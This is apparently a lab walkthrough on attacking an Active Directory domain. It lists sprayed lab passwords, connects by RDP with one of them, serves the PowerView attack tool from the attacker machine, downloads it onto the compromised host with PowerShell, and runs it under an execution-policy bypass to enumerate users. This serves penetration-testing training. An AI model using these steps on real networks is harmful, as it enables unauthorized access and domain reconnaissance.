Attacking Active Directory

Setting Up PowerView

PowerView is a PowerShell tool to gain network situational awareness on Windows domains. It contains a set of pure-PowerShell replacements for various Windows "net *" commands, which use PowerShell AD hooks and underlying Win32 API functions to perform useful Windows domain enumeration.

We have the following credentials. By spraying them and trying to authenticate to the different servers and services, you will see that elena.lopez has RDP access to 192.168.56.22.

miguel.cabrera = ilovebaseball
claudio.ortiz = babyboy
pacofish = pacofish
elena.lopez = princesa1

Installing xFreeRDP

sudo apt-get install aptitude
sudo aptitude install freerdp2-x11

aptitude may then prompt you that the dependencies are out of date. If it does, answer no to the first proposed solution (which would keep freerdp2-x11 uninstalled) and yes to the second one, which downgrades the libfreerdp and libwinpr dependencies to the matching version, as in the session below.

sudo aptitude install freerdp2-x11
The following NEW packages will be installed:
  freerdp2-x11{b} 
0 packages upgraded, 1 newly installed, 0 to remove and 228 not upgraded.
Need to get 104 kB of archives. After unpacking 837 kB will be used.
The following packages have unmet dependencies:
 freerdp2-x11 : Depends: libfreerdp-client2-2 (= 2.3.0+dfsg1-2+deb11u1) but 2.9.0+dfsg1-1~bpo11+1 is installed
The following actions will resolve these dependencies:

     Keep the following packages at their current version:
1)     freerdp2-x11 [Not Installed]                       



Accept this solution? [Y/n/q/?] n
The following actions will resolve these dependencies:

     Downgrade the following packages:                                                                       
1)     libfreerdp-client2-2 [2.9.0+dfsg1-1~bpo11+1 (now, parrot-backports) -> 2.3.0+dfsg1-2+deb11u1 (parrot)]
2)     libfreerdp2-2 [2.9.0+dfsg1-1~bpo11+1 (now, parrot-backports) -> 2.3.0+dfsg1-2+deb11u1 (parrot)]       
3)     libwinpr2-2 [2.9.0+dfsg1-1~bpo11+1 (now, parrot-backports) -> 2.3.0+dfsg1-2+deb11u1 (parrot)]         



Accept this solution? [Y/n/q/?] y
The following packages will be DOWNGRADED:
  libfreerdp-client2-2 libfreerdp2-2 libwinpr2-2 
The following NEW packages will be installed:
  freerdp2-x11 
0 packages upgraded, 1 newly installed, 3 downgraded, 0 to remove and 228 not upgraded.
Need to get 1,241 kB of archives. After unpacking 729 kB will be used.
Do you want to continue? [Y/n/?] y

RDP to Yonkers (192.168.56.22)

xfreerdp /d:north.newyork.local /u:elena.lopez /p:'princesa1' /v:192.168.56.22 /size:80%  /cert-ignore

Downloading PowerView.ps1 to the ParrotOS Lab Machine

wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1

Setup HTTP Server From ParrotOS Lab Machine

python3 -m http.server

Downloading PowerView From the ParrotOS Lab Machine (run on Yonkers)

powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.56.31:8000/PowerView.ps1', 'C:\Users\Elena.Lopez\Documents\PowerView.ps1')

PowerView Intro

Powershell -ep bypass
Import-Module .\PowerView.ps1
Get-NetUser
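As an added example that is not part of the original page, the download and import steps above combined into one script with an integrity check before anything is imported. The URL and destination path are the page's; $ExpectedSha256 is an assumed placeholder for the value of `sha256sum PowerView.ps1` run on the Parrot machine after the wget step.

```powershell
# Added example (not from the original page): fetch PowerView.ps1 from the lab
# HTTP server, verify its SHA-256 before importing, then run the first query.
# Assumptions: the Parrot box still serves the file on 192.168.56.31:8000 and
# $ExpectedSha256 is a placeholder for the output of `sha256sum PowerView.ps1`
# on the Parrot side; fill it in before use.
$Url            = 'http://192.168.56.31:8000/PowerView.ps1'
$Dest           = Join-Path $env:USERPROFILE 'Documents\PowerView.ps1'
$ExpectedSha256 = '<PLACEHOLDER-SHA256-FROM-PARROT>'

# Relax the execution policy for this process only; nothing machine-wide changes.
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass -Force

# Same WebClient download the page uses, wrapped so a failed fetch stops the script.
try {
    (New-Object System.Net.WebClient).DownloadFile($Url, $Dest)
} catch {
    throw "Download from $Url failed: $($_.Exception.Message)"
}

# Plain HTTP inside the lab gives no integrity guarantee, so compare the hash of
# what actually arrived with the hash computed on the serving machine.
# Get-FileHash returns uppercase hex; sha256sum prints lowercase, hence ToUpper().
$Actual = (Get-FileHash -Path $Dest -Algorithm SHA256).Hash
if ($Actual -ne $ExpectedSha256.ToUpper()) {
    Remove-Item $Dest -Force
    throw "Hash mismatch for PowerView.ps1: got $Actual, expected $ExpectedSha256"
}

# Import into the current session and run the first query from the page.
Import-Module $Dest
Get-NetUser | Select-Object samaccountname, description, lastlogon
```

On the Parrot side, `python3 -m http.server --bind 192.168.56.31` keeps the listener on the lab interface instead of every interface.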

Last updated 2 years ago